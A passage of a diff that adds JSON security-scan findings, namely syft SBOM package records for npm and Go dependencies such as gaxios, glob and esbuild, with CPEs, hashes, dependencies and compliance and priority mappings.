"components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2d3340f07fdb7b3f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: gaxios 6.7.1", + "title": "gaxios 6.7.1", + "description": "Package discovered: gaxios 6.7.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9d900b217a57abee", + "name": "gaxios", + "version": "6.7.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:gaxios:gaxios:6.7.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/gaxios@6.7.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/gaxios/-/gaxios-6.7.1.tgz", + "integrity": "sha512-LDODD4TMYx7XXdpwxAVRAIAuB0bzv0s+ywFonY46k126qzQHT9ygyoa9tncmOiQmmDrik65UYsEkv3lbfqQ3yQ==", + "dependencies": { + "extend": "^3.0.2", + "https-proxy-agent": "^7.0.1", + "is-stream": "^2.0.0", + "node-fetch": "^2.6.9", + "uuid": "^9.0.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "88029de581a160cb", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: gcp-metadata 6.1.1", + "title": "gcp-metadata 6.1.1", + "description": "Package discovered: gcp-metadata 6.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "aa3886c02ba5c2c5", + "name": "gcp-metadata", + "version": "6.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "Apache-2.0", + "spdxExpression": "Apache-2.0", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:gcp-metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:gcp-metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:gcp_metadata:gcp-metadata:6.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:gcp_metadata:gcp_metadata:6.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:gcp:gcp-metadata:6.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:gcp:gcp_metadata:6.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/gcp-metadata@6.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/gcp-metadata/-/gcp-metadata-6.1.1.tgz", + "integrity": "sha512-a4tiq7E0/5fTjxPAaH4jpjkSv/uCaU2p5KC6HVGrvl0cDjA8iBZv4vv1gyzlmK0ZUKqwpOyQMKzZQe3lTit77A==", + "dependencies": { + "gaxios": "^6.1.1", + "google-logging-utils": "^0.0.2", + "json-bigint": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "c4a7ba3815d4fc91", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: get-caller-file 2.0.5", + "title": "get-caller-file 2.0.5", + "description": "Package discovered: get-caller-file 2.0.5", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "adc0dd4bf4f30c10", + "name": "get-caller-file", + "version": "2.0.5", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:get-caller-file:get-caller-file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get-caller-file:get_caller_file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_caller_file:get-caller-file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_caller_file:get_caller_file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get-caller:get-caller-file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get-caller:get_caller_file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_caller:get-caller-file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_caller:get_caller_file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get:get-caller-file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get:get_caller_file:2.0.5:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/get-caller-file@2.0.5", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/get-caller-file/-/get-caller-file-2.0.5.tgz", + "integrity": "sha512-DyFP3BM/3YHTQOCUL/w0OZHR0lpKeGrxotcHWcqNEdnltqFwXVfhEBQ94eIo34AfQpo0rGki4cyIiftY06h2Fg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "fcd2d596421aca4c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: get-intrinsic 1.3.0", + "title": "get-intrinsic 1.3.0", + "description": "Package discovered: get-intrinsic 1.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "338eac46e71d483e", + "name": "get-intrinsic", + "version": "1.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:get-intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get-intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_intrinsic:get-intrinsic:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_intrinsic:get_intrinsic:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get:get-intrinsic:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get:get_intrinsic:1.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/get-intrinsic@1.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", + "integrity": "sha512-9fSjSaos/fRIVIp+xSJlE6lfwhES7LNtKaCBIamHsjr2na1BiABJPo0mOjjz8GJDURarmCPGqaiVg5mfjb98CQ==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "es-define-property": "^1.0.1", + "es-errors": "^1.3.0", + "es-object-atoms": "^1.1.1", + "function-bind": "^1.1.2", + "get-proto": "^1.0.1", + "gopd": "^1.2.0", + "has-symbols": "^1.1.0", + "hasown": "^2.0.2", + "math-intrinsics": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "13f511e3eb23bc5c", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: get-proto 1.0.1", + "title": "get-proto 1.0.1", + "description": "Package discovered: get-proto 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "64572c87855a75b1", + "name": "get-proto", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:get-proto:get-proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get-proto:get_proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_proto:get-proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get_proto:get_proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get:get-proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:get:get_proto:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/get-proto@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/get-proto/-/get-proto-1.0.1.tgz", + "integrity": "sha512-sTSfBjoXBp89JvIKIefqw7U2CCebsc74kiY6awiGogKtoSGbgjYE/G/+l9sF3MWFPNc9IcoOC4ODfKHfxFmp0g==", + "dependencies": { + "dunder-proto": "^1.0.1", + "es-object-atoms": "^1.0.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "9565869711547f61", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "startLine": 0 + }, + "message": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", + "title": "github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", + "description": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0b617a8d86aea060", + "name": "github.com/evanw/esbuild", + "version": "v0.0.0-20240609211631-fc37c2fa9de2", + "type": "go-module", + "foundBy": "go-module-binary-cataloger", + "locations": [ + { + "path": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "accessPath": "/node_modules/@esbuild/darwin-arm64/bin/esbuild", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "go", + "cpes": [ + { + "cpe": "cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2", + "metadataType": "go-module-buildinfo-entry", + "metadata": { + "goBuildSettings": [ + { + "key": "-buildmode", + "value": "exe" + }, + { + "key": "-compiler", + "value": "gc" + }, + { + "key": "-trimpath", + "value": "true" + }, + { + "key": "CGO_ENABLED", + "value": "0" + }, + { + "key": "GOARCH", + "value": "arm64" + }, + { + "key": "GOOS", + "value": "darwin" + }, + { + "key": "vcs", + "value": "git" + }, + { + "key": "vcs.revision", + "value": "fc37c2fa9de2ad77476a6d4a8f1516196b90187e" + }, + { + "key": "vcs.time", + "value": "2024-06-09T21:16:31Z" + }, + { + "key": "vcs.modified", + "value": "false" + } + ], + "goCompiledVersion": "go1.20.12", + "architecture": "arm64", + "mainModule": "github.com/evanw/esbuild", + "goCryptoSettings": [ + "standard-crypto" + ] + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "701c2b7f153ed08a", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/node_modules/esbuild/bin/esbuild", + "startLine": 0 + }, + "message": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", + "title": "github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", + "description": "Package discovered: github.com/evanw/esbuild v0.0.0-20240609211631-fc37c2fa9de2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0dc26b5347e8f4df", + "name": "github.com/evanw/esbuild", + "version": "v0.0.0-20240609211631-fc37c2fa9de2", + "type": "go-module", + "foundBy": "go-module-binary-cataloger", + "locations": [ + { + "path": "/node_modules/esbuild/bin/esbuild", + "accessPath": "/node_modules/esbuild/bin/esbuild", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "go", + "cpes": [ + { + "cpe": "cpe:2.3:a:evanw:esbuild:v0.0.0-20240609211631-fc37c2fa9de2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:golang/github.com/evanw/esbuild@v0.0.0-20240609211631-fc37c2fa9de2", + "metadataType": "go-module-buildinfo-entry", + "metadata": { + "goBuildSettings": [ + { + "key": "-buildmode", + "value": "exe" + }, + { + "key": "-compiler", + "value": "gc" + }, + { + "key": "-trimpath", + "value": "true" + }, + { + "key": "CGO_ENABLED", + "value": "0" + }, + { + "key": "GOARCH", + "value": "arm64" + }, + { + "key": "GOOS", + "value": "darwin" + }, + { + "key": "vcs", + "value": "git" + }, + { + "key": "vcs.revision", + "value": "fc37c2fa9de2ad77476a6d4a8f1516196b90187e" + }, + { + "key": "vcs.time", + "value": "2024-06-09T21:16:31Z" + }, + { + "key": "vcs.modified", + "value": "false" + } + ], + "goCompiledVersion": "go1.20.12", + "architecture": "arm64", + "mainModule": "github.com/evanw/esbuild", + "goCryptoSettings": [ + "standard-crypto" + ] + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0bd7d35ef088b0fd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: glob 10.5.0", + "title": "glob 10.5.0", + "description": "Package discovered: glob 10.5.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "8da722cb9983d6b3", + "name": "glob", + "version": "10.5.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:isaacs:glob:10.5.0:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/glob@10.5.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/glob/-/glob-10.5.0.tgz", + "integrity": "sha512-DfXN8DfhJ7NH3Oe7cFmu3NCu1wKbkReJ8TorzSAFbSKrlNaQSKfIzqYqVY8zlbs2NLBbWpRiU52GX2PbaBVNkg==", + "dependencies": { + "foreground-child": "^3.1.0", + "jackspeak": "^3.1.2", + "minimatch": "^9.0.4", + "minipass": "^7.1.2", + "package-json-from-dist": "^1.0.0", + "path-scurry": "^1.11.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": 